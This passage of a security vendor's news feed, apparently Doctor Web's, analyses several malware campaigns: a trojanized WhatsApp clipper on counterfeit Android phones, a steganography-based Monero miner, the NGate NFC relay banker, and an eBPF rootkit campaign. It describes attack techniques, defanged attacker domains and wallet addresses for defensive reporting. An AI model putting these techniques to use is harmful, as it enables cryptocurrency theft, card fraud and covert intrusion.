       &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic2.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
&lt;/div&gt;
&lt;div class="flex fxCenter"&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic3.png" class="preview"&gt;
       &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic3.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic4.png" class="preview"&gt;
       &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic4.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Product descriptions in bad Russian boasting “Fast Tastydragon CPU” [sic!] and “50 million cameras” [even sic’er!]&lt;/em&gt;&lt;/p&gt;

&lt;div class="flex fxCenter"&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic5.png" class="preview"&gt;
       &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic5.2.png" alt="virus app" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic6.png" class="preview"&gt;
       &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic6.2.png" alt="virus app" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Screenshot of the application used to spoof technical specifications of the device and the result of its operation&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;To verify device specifications with greater certainty, you can use an app called DevCheck. In most cases, this application accurately determines the product specifications, even if the manufacturer is trying to mislead the consumer.&lt;/blockquote&gt;

&lt;p&gt;To create their trojanized WhatsApp application, the threat actors used the &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt; tool. This framework allows the behavior of the main application to be modified, without altering its code, and additional software modules to be loaded. In this case, the criminals placed the malicious module &lt;span class="string"&gt;com.whatsHook.apk&lt;/span&gt; in the &lt;span class="string"&gt;assets&lt;/span&gt; folder, which performs the following functions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;application update hijacking. Instead of checking for updates at &lt;span class="string"&gt;hxxps://www.whatsapp[.]com/android/current/WhatsApp[.]apk&lt;/span&gt;, the application now contacts one of the attackers' servers, e.g., &lt;span class="string"&gt;hxxps://apk-download[.]pro/download/whatsapp[.]apk&lt;/span&gt;. This keeps the application trojanized across updates and lets the threat actors push whatever changes they need;&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic7.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Method that hijacks requests to the legitimate update server&lt;/em&gt;&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic8.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic8.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Class that swaps the legitimate update address with the fake one&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;searches for strings in received and sent messages that match the wallet address patterns for the Tron (34-character string starting with T) and Ethereum (42-character string starting with 0x) cryptocurrencies and replaces them with the attackers' addresses. The cybercriminals extended the basic clipper functionality so that the victim does not even suspect that something is wrong. For an outgoing message, the compromised device displays the correct address of the victim's own wallet, while the recipient of the message is shown the address of the fraudsters' wallet. For an incoming message, the sender sees the address of their own wallet, while on the victim's device the incoming address is replaced with the address of the hackers' wallet. The scammers change wallet addresses with each iteration of the campaign, but the trojan also contains backup addresses ("TN7pfenJ1ePpjoPFaeu46pxjT9rhYDqW66", "0x673dB7Ed16A13Aa137d39401a085892D5e1f0fCA") that are used if, for some reason, communication cannot be established with the C2 server. In addition, the trojan sends all messages from all WhatsApp chats to the attackers' server;&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic9.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic9.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Parser that searches for strings matching Tron wallet addresses&lt;/em&gt;&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic10.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic10.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Parser that searches for strings matching Ethereum wallet addresses&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;searches for all .jpg, .png, and .jpeg images in the following folders and sends them to the attackers’ server;&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="ScrollX"&gt;
  &lt;table class="Table"&gt;
    &lt;tr&gt;
      &lt;td&gt;DCIM&lt;/td&gt;
      &lt;td&gt;DOWNLOADS&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;PICTURES&lt;/td&gt;
      &lt;td&gt;DOCUMENTS&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;ALARMS&lt;/td&gt;
      &lt;td&gt;SCREENSHOTS&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/table&gt;
&lt;/div&gt;

&lt;p&gt;This is done to find the so-called mnemonic (recovery) phrase for crypto wallets, which is a set of 12-24 words in a specific order. Such a phrase is displayed once when a wallet is created, and many users simply take a screenshot of it instead of writing it down or saving it to a separate medium. For legitimate purposes, such phrases allow the wallet to be accessed if the user forgets the password. For attackers, obtaining such data means the ability to instantly withdraw all the money from the cryptocurrency wallet.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic11.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic11.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An example of a mnemonic phrase for recovering access to a cryptocurrency wallet. The user must enter these words in numerical order.&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;sends information about the device: the device manufacturer, model, language settings, and the name of the trojanized application. In total, the scammers modified about 40 different applications. These include the aforementioned WhatsApp and Telegram, as well as other messengers, QR code scanners, etc. Most importantly, popular cryptocurrency wallet applications (MathWallet, Trust Wallet, and others) were affected as well.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This trojan has been given the unique name Shibai in the Doctor Web virus database due to the string &lt;span class="string"&gt;Log.e("", "-------------------SHIBAI-释放------------")&lt;/span&gt; contained in its code. We assume that this is a reference to the name of another crypto coin.&lt;/p&gt;

&lt;p&gt;Unfortunately, this campaign has gained a great deal of momentum. The hackers employ more than 60 C2 servers to manage it and approximately 30 domains to distribute malicious applications. We were also able to obtain information about the financial gains made by the trojan’s creators. One of the wallets has received more than a million dollars over the last two years. Overall assets in another wallet amounted to half a million dollars. The rest of the wallets (about 20 of them) held amounts of up to $100,000. It is impossible to get a complete picture of the profitability of this campaign, as the wallet addresses are fetched from the attackers' server and change from time to time.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic12.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/shibai/pic12.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;One of the crypto wallets with the most assets&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;To protect yourself from such attacks, our virus analysts recommend installing Dr.Web Security Space antivirus for mobile devices, avoiding smartphones whose advertised features clearly do not match their price, downloading applications only from trusted sources, such as Google Play, RuStore and AppGallery, and not storing screenshots of mnemonic phrases, passwords, and keys on the device in unencrypted form.&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Tool.LSPatch.1&amp;lng=en"&gt;&lt;b&gt;Tool.LSPatch.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/SHIBAI_campaign/Readme.adoc"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14976&amp;lng=en</guid><title>Doctor, where did you get these pictures? Using steganography in a cryptocurrency mining campaign.</title><link>https://news.drweb.com/show/?i=14976&amp;lng=en&amp;c=23</link><pubDate>Fri, 24 Jan 2025 07:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 24, 2025&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;When analyzing telemetry data, virus analysts at Doctor Web identified malware samples that, upon closer examination, turned out to be components of an active campaign to mine the Monero cryptocurrency. This campaign is notable because it is implemented as a series of malware chains, two of which are based on executing scripts that extract malicious payloads from BMP image files.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The campaign likely began in 2022, when our analysts first observed &lt;span class="string"&gt;Services.exe&lt;/span&gt;, a .NET application that launched a malicious VBScript. This script implements backdoor functionality by contacting the attacker's server and executing the scripts and files sent in response. For example, the malicious file &lt;span class="string"&gt;ubr.txt&lt;/span&gt;, a PowerShell script whose extension was changed from ps1 to txt, was downloaded to the victim's computer.&lt;/p&gt;
&lt;p&gt;The &lt;span class="string"&gt;ubr.txt&lt;/span&gt; script checks for miners that may already be installed on the compromised machine and replaces them with the versions the attackers provide. The files installed by the script are the SilentCryptoMiner miner and its configuration, which the hackers used to mine the Monero cryptocurrency.&lt;/p&gt;

&lt;p&gt;We have &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.com/show/?i=14920"&gt;reported&lt;/a&gt; on the use of &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.com/show/?i=14792&amp;lng=ru&amp;c=23"&gt;this miner&lt;/a&gt; by attackers who are attracted by its ease of configuration, its advanced capabilities for mining different types of cryptocurrencies and hiding from diagnostic utilities, and its ability to remotely manage all of the miners in the botnet via a web panel.&lt;/p&gt;

&lt;p&gt;As part of this campaign, the miner files are disguised as components of various software, such as the Zoom video conferencing application (&lt;span class="string"&gt;ZoomE.exe&lt;/span&gt; and &lt;span class="string"&gt;ZoomX.exe&lt;/span&gt;), Windows services (&lt;span class="string"&gt;Service32.exe&lt;/span&gt; and &lt;span class="string"&gt;Service64.exe&lt;/span&gt;), etc. Although there exist several sets of malicious modules with different names, they all perform the same tasks: removing other miners, installing a new miner, and delivering updates for it.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;PowerShell script &lt;span class="string"&gt;ubr.txt&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In addition, the miner accesses the getcert[.]net domain, which hosts the &lt;span class="string"&gt;m.txt&lt;/span&gt; file containing the cryptocurrency mining settings. This domain is also used in other infection chains.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The miner configuration included in the &lt;span class="string"&gt;m.txt&lt;/span&gt; file&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Later, the attackers modified their infection chain in a far more interesting way, incorporating steganography.&lt;/p&gt;

&lt;blockquote&gt;
    Steganography is a method of hiding information within other information. Unlike cryptography, which can draw attention to encrypted data, steganography allows information to be hidden inconspicuously, such as in an image. Many cybersecurity experts believe that the use of steganography to bypass defenses will grow in popularity.
&lt;/blockquote&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;

&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The image on the left (credit: &lt;a target="_blank" rel="noopener noreferrer" href="https://unsplash.com/@marekpiwnicki"&gt;Marek Piwnicki&lt;/a&gt;) contains a hidden image with the Dr.Web logo&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The second, more recent chain employs the Amadey trojan, which runs the PowerShell script &lt;span class="string"&gt;Async.ps1&lt;/span&gt;. The script downloads BMP images from the legitimate image-hosting site imghippo.com. A steganographic algorithm extracts two executables from the images: the &lt;a href="https://vms.drweb.com/search/?q=Trojan.PackedNET.2429&amp;lng=en"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt; stealer and a payload that does the following:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;Disables the UAC prompt for administrators&lt;/li&gt;
    &lt;li&gt;Adds numerous exclusions to the built-in Windows Defender antivirus&lt;/li&gt;
    &lt;li&gt;Disables notifications in Windows&lt;/li&gt;
    &lt;li&gt;Creates a new scheduled task in &lt;span class="string"&gt;\Microsoft\Windows\WindowsBackup\&lt;/span&gt; with the name 'User'.&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contents of the &lt;span class="string"&gt;Async1.ps&lt;/span&gt; script&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;During its execution, the task accesses the attackers' domains, whose DNS TXT record contains the address of the payload. Once the payload, an archive containing BMP images, has been downloaded, it is unpacked and the following files are launched:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;Cleaner.txt&lt;/span&gt;, a PowerShell script that removes all other miners,&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;m.txt&lt;/span&gt;, a PowerShell script that extracts payloads from &lt;span class="string"&gt;m.Bmp&lt;/span&gt; and &lt;span class="string"&gt;IV.Bmp&lt;/span&gt; images. The payload inside the images is SilentCryptoMiner and the injector that runs it,&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;Net.txt&lt;/span&gt;, a script that reads a DNS TXT record from the domains windowscdn[.]site and buyclients[.]xyz. This record contains a payload link pointing to raw.githack[.]com.&lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
    A DNS TXT record is a standard DNS record type that holds free-form text; it is commonly used to prove ownership of a domain. However, the domain owner can place any data in it, including, as in this case, a payload link.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contents of the archive with malicious images&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The miner modules are constantly evolving. Recently, the authors switched to using legitimate resources to host malicious images and the GitHub platform to store payloads. Additionally, we have observed modules that verify whether this malware is running in sandboxes and virtual machines.&lt;/p&gt;
&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A module that checks the names of running applications against the names of common tools used by cybersecurity researchers&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One of the wallets found in the miner's configuration was created in May 2022, and so far it has received 340 XMR. Because the exchange rate of this cryptocurrency is going through a period of significant volatility, the fraudsters' profit in this case could be 65–70 thousand USD. Judging by the wave-like shape of the hash rate curve, which indicates that the computers in the botnet are turned on and off regularly, this mining campaign mostly involves ordinary users located in the same group of time zones. On average, the hash rate is 3.3 million hashes per second, which allows the compromised machines to earn the attackers 1 XMR every 40 hours or so.&lt;/p&gt;
&lt;p&gt;This campaign is just the tip of the iceberg in the world of steganography-based cyber threats and underscores the importance of being vigilant in the digital space. Doctor Web's recommendations remain unchanged: only install software from reliable sources, do not click on suspicious links, and do not disable antivirus protection when downloading files from the Internet.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_en.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_en_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Attack chain&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/get_cert%20campaign"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a target="_blank" rel="noopener noreferrer" href="https://vms.drweb.com/virus/?i=25898223"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=PowerShell.Starter.98&amp;lng=en"&gt;&lt;b&gt;PowerShell.Starter.98&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=PowerShell.DownLoader.1640&amp;lng=en"&gt;&lt;b&gt;PowerShell.DownLoader.1640&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Trojan.PackedNET.2429&amp;lng=en"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=VBS.DownLoader.2822&amp;lng=en"&gt;&lt;b&gt;VBS.DownLoader.2822&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14969&amp;lng=en</guid><title>Contactless banking for thee (and for thief): NFC money theft scheme reaches Russian users</title><link>https://news.drweb.com/show/?i=14969&amp;lng=en&amp;c=23</link><pubDate>Thu, 26 Dec 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Malware analysts at “Doctor Web” warn about the emergence of new versions of the NGate banking trojan, targeting users in Russia. This trojan relays data from the NFC chip of the compromised device, allowing the attacker to withdraw money from the victim's accounts at ATMs without any involvement on the victim’s part.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The NGate banker first appeared on the radar of antivirus vendors in the autumn of 2023, when reports of attacks on customers of major Czech banks began to appear in specialized media. The attackers' strategy involved a combination of social engineering, phishing and the use of malware. When used together, these standard tactics created a rather innovative scenario: after interacting with the victim, the hackers gained remote access to the NFC capabilities of their payment method. Law enforcement in the Czech Republic was able to stop this campaign, but its concept was adapted to the Russian context and used there for illegal enrichment.&lt;/p&gt;

&lt;p&gt;The event that initiates the attack chain is likely to be a phone call from fraudsters claiming that the victim is eligible for a social benefit or other financial gain. To receive it, the victim must tap on the link, which leads to a fraudulent website that hosts a malicious APK containing the NGate trojan. The APK is disguised as an application for the Gosuslugi (government services) portal, the Bank of Russia or one of the other popular banks.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/0.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/0.png" alt="danger_apps_icons"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Icons of fake applications, made to look like their official counterparts&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The NGate banking trojan is a malicious modification of the open source NFCGate application, which was developed to debug NFC data transfer protocols. NFCGate supports a number of functions, but of most interest to attackers is the ability to capture NFC traffic and send it to a remote device, which could be either an intermediary server or the attacker's own smartphone. The criminals have modified the source code by adding user interfaces similar to the official applications and enabling the NFC data relay mode. In addition, the application includes the &lt;span class="string"&gt;nfc-card-reader&lt;/span&gt; library, which allows the hackers to remotely obtain the card number and its expiry date.&lt;/p&gt;

&lt;p&gt;After launching the application, the victim is prompted to place their payment card on the back of the smartphone, enter the PIN and wait for the fake application to verify the card. At this point, all the data on the card is read and transferred to the criminals. Note that the compromised smartphone does not need to be rooted to expose its NFC data.&lt;/p&gt;

&lt;div class="margTM margBM flex center"&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/5.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/5.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/1.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/1.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/2.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/2.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/vir-news/3.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/vir-news/3.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Screens that ask the victim to place their bank card on the back of their smartphone.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;While the victim holds their card close to their smartphone, the attacker is already at the ATM requesting a cash withdrawal. Another option is to use this scheme for contactless payments. When the ATM asks for the bank card, the hacker simply taps their phone, which will transmit the digital thumbprint of the victim's bank card. The transaction is confirmed using the PIN code the victim previously submitted.&lt;/p&gt;

&lt;p&gt;To prevent money theft, the analysts at “Doctor Web” have the following recommendations:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;do not share your PIN or CVV codes for your bank cards,&lt;/li&gt;
  &lt;li&gt;use an antivirus program; it will block the download and installation of malicious applications,&lt;/li&gt;
  &lt;li&gt;carefully check the addresses of web pages that ask for financial information,&lt;/li&gt;
  &lt;li&gt;only install applications from official sources such as AppGallery and Google Play,&lt;/li&gt;
  &lt;li&gt;do not talk to scammers. If you receive an unexpected call from the police, a bank or any other organization, simply hang up. If you have any doubts about the legitimacy of the call, find the contact details on the official website and contact the organization yourself.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Android.Banker.NGate.1&amp;lng=en"&gt;&lt;b&gt;Android.Banker.NGate.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Android.Banker.NGate.1" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14955&amp;lng=en</guid><title>Malware trends: eBPF exploitation, malware configurations stored in unexpected places, and increased use of custom post-exploitation tools</title><link>https://news.drweb.com/show/?i=14955&amp;lng=en&amp;c=23</link><pubDate>Tue, 10 Dec 2024 11:09:06 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;December 10, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;An investigation into an information security incident has allowed virus analysts at Doctor Web to uncover an ongoing campaign that incorporates many modern trends employed by cybercriminals.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A client approached Doctor Web after suspecting that their computer infrastructure had been compromised. While analyzing the client’s data, our virus analysts identified a number of similar cases, leading them to conclude that an active campaign was underway. It appears that the hackers' efforts are primarily concentrated in Southeast Asia. During the attacks, they utilize a comprehensive suite of malware that is deployed at various stages. Unfortunately, it was impossible for our analysts to determine how initial access to the compromised machines was obtained. However, they were able to reconstruct the rest of the attack chain. Notably, the threat actors managed to maliciously exploit eBPF (extended Berkeley Packet Filter) technology.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;eBPF technology was developed to enhance control over the network subsystem of the Linux operating system and its processes. It has demonstrated significant potential, attracting the attention of major IT companies: almost from the moment of its inception, giants like Google, Huawei, Intel, and Netflix joined the eBPF Foundation to participate in its further development. Unfortunately, hackers have also taken an interest in eBPF.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;By providing extensive low-level capabilities, eBPF can be used by malicious actors to conceal network activity and processes, gather confidential information, and bypass firewalls and intrusion detection systems. The amount of effort needed to detect such malware allows hackers to use it in APT (advanced persistent threat) attacks and to mask their presence for extended periods.&lt;/p&gt;
&lt;p&gt;These are the capabilities that the attackers decided to exploit by loading two rootkits onto the compromised machine. The first was an eBPF rootkit that concealed the operation of another rootkit, implemented as a kernel module, which in turn prepared the system for the installation of a remote access trojan. A notable feature of the trojan is its support for various traffic-tunneling technologies that allow it to communicate with the attackers from private network segments and conceal the transmission of commands.&lt;/p&gt;
&lt;p&gt;Overall, since 2023, the use of malicious eBPF software has been gaining momentum. This is evidenced by the emergence of several families of malware based on this technology, including Boopkit, BPFDoor, and Symbiote. New vulnerabilities, routinely found in this technology, only exacerbate the situation. As of now, 217 BPF vulnerabilities are known to exist, with about 100 of them discovered in 2024.&lt;/p&gt;
&lt;p&gt;Another notable feature of the campaign is the rather creative approach taken by the threat actors with regard to storing the trojan's settings. Previously, they typically used dedicated servers for this purpose, but cases in which malware configurations are stored openly on public platforms are now increasing. For example, the malware in question accessed platforms like GitHub and even a Chinese blog on information security. This helps draw less attention to the traffic coming from the compromised machine, as to an unsuspecting observer, the machine appears to be interacting with a safe network host. It also removes the need to maintain access to a control server where the settings are stored. Overall, the idea of leveraging publicly available services as a control infrastructure is not new; hackers are known to have previously used Dropbox, Google Drive, OneDrive, and even Discord for this purpose. However, regional restrictions on these services in several countries, particularly in China, make them less attractive in terms of ensuring availability. Meanwhile, access to GitHub remains available to most providers, making it preferred in the eyes of hackers.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.png" class="preview"&gt;
